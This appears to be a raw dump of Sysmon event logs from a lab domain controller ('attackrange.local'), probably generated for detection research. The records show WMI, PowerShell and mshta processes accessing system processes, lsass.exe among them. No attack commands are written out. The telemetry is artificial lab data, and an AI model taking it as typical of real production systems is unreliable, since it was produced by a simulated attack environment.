16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000030742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.489{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_enuny5rn.kau.ps12021-01-20 16:09:49.489 10341000x800000000000000030741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.473{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CC-6008-F506-00000000A301}6084C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 